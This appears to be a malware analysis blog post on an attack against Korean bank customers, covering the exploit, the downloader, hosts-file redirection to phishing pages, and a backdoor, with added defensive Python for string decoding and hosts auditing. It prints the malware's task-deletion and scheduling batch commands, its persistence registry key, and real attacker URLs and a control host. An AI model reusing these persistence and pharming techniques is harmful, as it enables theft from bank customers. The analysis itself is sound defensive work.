In this blog post, we will look at the attack originating from hxxp://www.spc.or.kr/ and targeting several major Korean banks.
The original website, rootadmin2012.com, contains the following three lines of code:
The first two items are iframes which contain heap-spray code and shellcode, and the last script tag is a counter, which tells the cybercriminals how many times the main attack page was executed.
After a brief examination of 1.html, we can notice a variable with the interesting name "shellcode"
which, after unquoting, gives us the following shellcode:
You can notice visible text strings inside: Urlmon, which is a Windows library for internet communication; C:\x.exe, which is the name of the file in which the downloaded content is stored and later executed; and http://rootadmin2012.com/sun.exe, which contains another stage of the attack.
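The decoding step described above can be reproduced offline. The following is an added example, not code from the original post: it rebuilds the bytes behind a %u-escaped JavaScript string and lists the printable strings in them. The function names and the sample page are constructed for illustration, and stage2.example is a placeholder URL.

```python
import re

def unescape_js(text):
    """Rebuild the bytes a JavaScript unescape() result occupies in memory."""
    out = bytearray()
    for m in re.finditer(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|(.)", text, re.S):
        if m.group(3) is not None:
            out += m.group(3).encode("utf-16-le")   # literal character
        else:
            # %uXXXX and %XX are each one UTF-16 code unit, stored little-endian
            out += int(m.group(1) or m.group(2), 16).to_bytes(2, "little")
    return bytes(out)

def printable_strings(data, min_len=4):
    """Return runs of printable ASCII, like the 'strings' utility."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [s.decode("ascii") for s in re.findall(pattern, data)]

def strings_in_page(source, min_len=4):
    """Find %u-escaped runs in page source and list the strings they hide."""
    found = []
    for run in re.findall(r"(?:%u[0-9a-fA-F]{4}){4,}", source):
        found += printable_strings(unescape_js(run), min_len)
    return found

def to_percent_u(raw):
    """Helper used only to build the constructed sample below."""
    raw += b"\x00" * (len(raw) % 2)
    return "".join("%%u%02x%02x" % (raw[i + 1], raw[i])
                   for i in range(0, len(raw), 2))

# Constructed sample: four non-printable filler bytes followed by
# NUL-terminated strings of the kind described in the text.
SAMPLE_RAW = (b"\x90\x90\xeb\x10" + b"urlmon\x00" + b"C:\\x.exe\x00"
              + b"http://stage2.example/payload.exe\x00")
SAMPLE_PAGE = 'var shellcode = unescape("' + to_percent_u(SAMPLE_RAW) + '");'

if __name__ == "__main__":
    for s in strings_in_page(SAMPLE_PAGE):
        print(s)
```

Library names, drop paths and next-stage URLs recovered this way are usable as indicators before any deeper analysis of the shellcode.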
After observing cc.html, we can notice some other interesting strings:
This gives us a hunch that this exploit has something to do with Internet Explorer (ie) and heap spraying (heaplib). After further searching, we were able to determine that this attack uses the CVE-2012-1889 (http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1889) vulnerability, which allows a remote attacker to execute arbitrary code via a crafted web site. Search for classid=f6D90f11-9c73-11d3-b32e-00C04f990bb4 in both cc.html and the exploit database entry at http://www.exploit-db.com/exploits/19186/.
It is important to note that this attack worked only on computers with DEP (Data Execution Prevention) disabled. If you run this attack on a computer with DEP enabled, the following message is displayed:
File sun.exe is the second stage downloader, size 15KB, written in Visual Basic. It has the same icon as Microsoft Word documents.
When it gets downloaded, it performs the following tasks:
1) Checks internet connection by downloading an image from naver.net, which is a Korean search engine
If (sizeOfFile("c:\ntldrs\Isinter.gif") > 0) Then
which is then appended to the hosts file C:\WINDOWS\system32\drivers\etc\hosts. Any time a user accesses any of the above-mentioned websites belonging to Korean banks, he/she gets redirected to 220.127.116.11 (softbank126114224053.bbtec.net), which is a server located in Japan.
3) Opens the website http://myadmin2012.com/tong.htm in "C:\Program Files\Internet Explorer\IEXPLORE.EXE",
which is a script for another counter, which tells the attackers how many times the downloader was downloaded.
4) To make itself persistent (in case of computer reboot, etc.), it modifies the Software\Microsoft\Windows\CurrentVersion\Run registry key by adding a value with name "skunser" and data "C:\ntldrs\svchest.exe", where it previously copied itself.
stores it into tongji2.exe, and executes it. Tongji2 is a backdoor file which attempts to connect to another website controlled by cybercriminals.
6) It drops and executes the following batch file, which schedules the start of the downloader every 30 minutes. "At XX:XX /interactive" ensures that svchest.exe is started with Local System privileges (on WinXP), which are higher than Administrator privileges.
schtasks /delete /tn * /f
sc config Schedule start= auto
net start "Task Scheduler"
At 0:00 /interactive c:/ntldrs/svchest.exe
At 0:30 /interactive c:/ntldrs/svchest.exe
At 1:00 /interactive c:/ntldrs/svchest.exe
At 1:30 /interactive c:/ntldrs/svchest.exe
At 24:30 /interactive c:/ntldrs/svchest.exe
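The hosts-file redirection described in the list above can be checked for on a suspect machine. The following is an added example, not code from the original post: it parses hosts-file text and reports watched domains that are pinned to a non-loopback address, grouped by IP. The domains and addresses in the sample are constructed placeholders; on a real system the input would be the contents of C:\WINDOWS\system32\drivers\etc\hosts and the watch list would hold the banks' real domains.

```python
import ipaddress
from collections import defaultdict

def parse_hosts(text):
    """Yield (ip, hostname) pairs from hosts-file text, skipping comments."""
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first field is not an address, so not a mapping
        for name in fields[1:]:
            yield ip, name.lower().rstrip(".")

def audit_hosts(text, watched):
    """Return {ip: [hostnames]} for watched domains pinned to a routable IP."""
    watched = [d.lower() for d in watched]
    hits = defaultdict(list)
    for ip, name in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            continue  # 127.0.0.1 / 0.0.0.0 entries block a name, not redirect it
        if any(name == d or name.endswith("." + d) for d in watched):
            hits[str(ip)].append(name)
    return dict(hits)

# Constructed sample: one address carrying several bank names, as in the post.
SAMPLE_HOSTS = "\n".join([
    "# constructed sample hosts file",
    "127.0.0.1       localhost",
    "203.0.113.10    www.bank-a.example",
    "203.0.113.10\tbank-b.example  WWW.Bank-B.example   # appended entry",
    "0.0.0.0         ads.bank-a.example",
    "198.51.100.7    intranet.corp.example",
])
WATCHED = ["bank-a.example", "bank-b.example"]  # placeholder watch list

if __name__ == "__main__":
    for ip, names in audit_hosts(SAMPLE_HOSTS, WATCHED).items():
        print(ip, "<-", ", ".join(names))
```

A single address that carries several unrelated banking domains, as in the sample, is the pattern this attack leaves behind.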
The third stage of the attack is the main tongji2.exe module.
This module is an executable with a size of about 1.3M, written in Delphi and packed with Safengine. From dynamic analysis, we can observe that after execution it injects itself into iexplore.exe to become less suspicious for untrained computer users. It then tries to initiate a connection via a custom communication protocol. Received messages are decrypted by a simple xor loop. Then, depending on the contents of the received message, it chooses to execute one of many built-in functions, for example, download file, reboot computer, read clipboard, read registry, read system information and many others. We can classify this as a backdoor trojan and infostealer, which allows attackers to control the compromised computer. It also tries to connect to laoding521.eicp.net, port 889. eicp.net is a free Chinese webhosting service, which belongs to oray.com.
Let's have a look at the consequences of the modified hosts file. In a screenshot above, we show that the hosts file is modified in such a way that the IP address is followed by the URL address of a Korean bank. The same scenario occurs more than once - for several Korean banks. We will show you an example of Kookmin Bank (KBStar). In the screenshot below, you can see the original KBStar webpage. Notice the red oval in the upper left corner. It shows https (http-secure): communication is encrypted, and therefore all data entered and sent by the bank's customer is encrypted before being sent.
When we open the same webpage on an infected computer (with a modified hosts file), it will show exactly the same page (visually), but the source code of the main webpage is now different. The user does not communicate with the bank's website, but with the attacker's server. See the screenshot below. We can notice that the string "onclick=otperror('')" is repeated often in the fake site (left), while normal links are displayed in the original site (right).
After the user clicks on any link on the fake webpage, he/she is shown the following error message saying that the computer was infected by a virus and, for security reasons, he/she needs to fill in an application for a fraud prevention service.
After clicking the OK button, the user is redirected to a page where he/she is asked for their name and social security number (SSN). When the format of the entered SSN is correct, it redirects users to further forms asking for more customer details, including address, phone number, security card, and many more details.
Note the upper left corner. These forms are not encrypted, therefore all private customer information is being sent to the attackers in unencrypted form. Cybercriminals then have all the victim's credentials and can plunder money from the victim's account.
Many Korean websites require a name and SSN for registration. There have been many SSN leaks, so some websites started moving to an IPIN (Internet Personal Identification Number), which is a secure replacement for name and SSN. However, IPIN is still not very popular, so name and SSN are still valuable information. A similar situation is occurring with the Security Card, which is also an important part of Korean Internet banking. Without this card, customers can't issue a certificate for internet banking. A few years ago, many Korean banks started moving to OTP (One Time Password) dongles. However, many people are still using security cards, which is why cybercriminals want to steal them too. Korean internet banking might be more secure if all customers used the previously mentioned safer methods of authentication. Unfortunately, there are still many people using old and less secure methods of accessing their accounts. Cybercriminals know it and take advantage of it.
Both domains are hosted at the following IP address in Japan:
The attack probably originates in China. Aside from the location of the final host (laoding521.eicp.net), which is in China, analysis of both the 2nd and 3rd stage executables makes us think so. First of all, file names like tongji (statistics), tong (connect), pao (run) are definitely Chinese.
After decompiling the second stage downloader, we can find further Chinese words:
Private Sub duquwenjian_Timer (wenjian = document, file)
Attribute VB_Name = "hei" (hei = hack)
Public Sub chuangjian (chuangjian = find, establish)
Public Sub wanbi (wanbi = finish, end, complete)
The 3rd stage is protected with Safengine, a Chinese executable protector, which is typically not seen with malware coming from other countries.